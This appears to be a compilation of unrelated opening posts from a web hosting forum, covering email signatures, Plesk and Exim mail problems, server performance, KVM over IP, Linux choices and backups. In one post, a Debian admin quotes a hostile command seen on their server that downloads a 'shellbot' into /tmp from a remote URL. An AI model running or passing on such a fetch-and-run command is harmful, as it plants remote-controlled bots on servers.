I have a technical issue which I need to address, which is email signatures. Larger companies have email signatures which are posted by the server, and not the client. I was wondering if it was possible to put a signature on all emails which leave a particular domain using this method?
I'm working on a project that requires patients of a large medical practice to go online and fill out various medical question/information forms at their own leisure. This information is entered through a complex system of forms (depending on the type of patient, injury, etc.). However, on many of the forms a patient would have to fill out by hand, they need to sign to ensure information is completed accurately and completely.
So here's my question - what exactly is required to make a digital signature from a website that will hold up in court as strong as a hand-written signature? I've seen other forms that have you type your complete name and date, but is this all that's required? This needs to be as strong and mean the same thing as a signed piece of paper.
I've done a little research, but there really isn't much out there on this stuff. I found some information at W3C (sorry I can't link; I do not have 5 posts yet) but to be honest, I'm really confused by it all.
One of the projects I will work on will require to process 50,000 emails a day. Most of these emails would include attachments and the challenge is to process them and put all the stuff into a database for the application to use.
My biggest concern is spam and we cannot afford to lose out on legitimate emails. One way of configuring the setup would entail checking emails for the specific types of attachments and piping it in.
However I was just wondering if someone here has dealt with this volume of emails and also what are the spam limiting options available (even commercial would do)
Basically what I want to do is to change the "From: "email address for system user "Plesk Administrator" when sending the automated notification with subject "Parallels Panel Scheduler notification". Where would I do this?
I'm having difficulty sending an email to another email address (with a different domain) which is on the same VPS.The trouble is, on the other domain's VPS control panel, within the DNS settings, the MX records have been pointed externally (to an exchange server). Their email is turned off. But bizarrely, their mailbox is full.
It seems as though Plesk is ignoring the MX records, and sending MY email internally to the OTHER domain's mailbox on the same VPS.How do I get Plesk to send my mail to the correct EXTERNAL MX records?
One of my customers asked me if is possible technically to offer free email services.
Since he's going to launch a big portal he want to offer such things later, for all users.
Now, there are problems as: a) if there is any possibility to compress emails similar with GMAIL or YahooMail or so, because i can't imagine the email is uncompressed
b) how can be handled email boxes over multiple (mail ?) servers if the HDD space needed would be larger than for one server HDD ?
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.
I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.
So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?
Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.
Anytime I restart Apache, it loads quick for a few seconds then gets slow again...
Here are the top few processes listed on the process manager: .....
I have a VPS acct with Plesk, am peaking out my system ram at 128mb. Host said to allocate ,ore = purchase more. What I would like to do is hunt down where I am using the most of it. I have 8 sites (non that are too big). Most of them are wordpress sites.
Would caching help? Not sure where to look to find this out.
Ive been getting the following System Warning every hour since I set the server up 5 days ago and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. Im hoping someone here can point me in the right direction. Im running Windows 2003 Web Edition.

I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code: hubberfix
sh -c cd /tmp;lwp-download [url] shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. And incase it helps, the servers have 512mb of ram, about 30 - 40GB of hDD (not actually sure) and an old AMD Duron.

I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc.
I dont want to see that some day something crash - and I will must start over with everything.
What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc.
I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.
I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background?
Also please suggest me some good links from where I can get basic linux command and some kind of flash tutorials from which I get to know how to do work in Appache and dns etc.
I am having an email issue and I can not resolve. I am hoping for some assisstance here.
One of my local clients are not able to email each other in their office. (About 10 employess I believe)
They are using Outlook mail client, and using ISP's SMTP server. They are able to send/recieve email to other users externally, but not intenally.
Using webmail works perfectly fine.
I spoke with my host and the said everything is working fine. I checked with the ISP to see if they are blocking the IP address on the SMTP server. They said they were not.
I have a personal account on the same server and tried to send email to another local email account, and it did not work either. Tried to send email to my clients email and they did not recieve anything.
I am on the same ISP as my client, so Im still not sure if its the ISP or not.
I setup mail piping with Exim so that e-mails sent to a specific account be forwarded to my PHP script. It's not working properly, because when I send a mail to this account, it's bounced by the mailer daemon:
Code: This message was created automatically by mail delivery software.
A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed:

I have VPS having whm/cpanel base, i also install RT ticket system, it install successfully, same way i did on 5 other server its ok, but on VPS due to apache different configuration it gives me.
You haven't yet configured your webserver to run RT. You appear to have installed RT's web interface correctly, but haven't yet configured your web server to "run" the RT server which powers the web interface. The next step is to edit your webserver's configuration file to instruct it to use RT's mod_perl, FastCGI or SpeedyCGI handler.
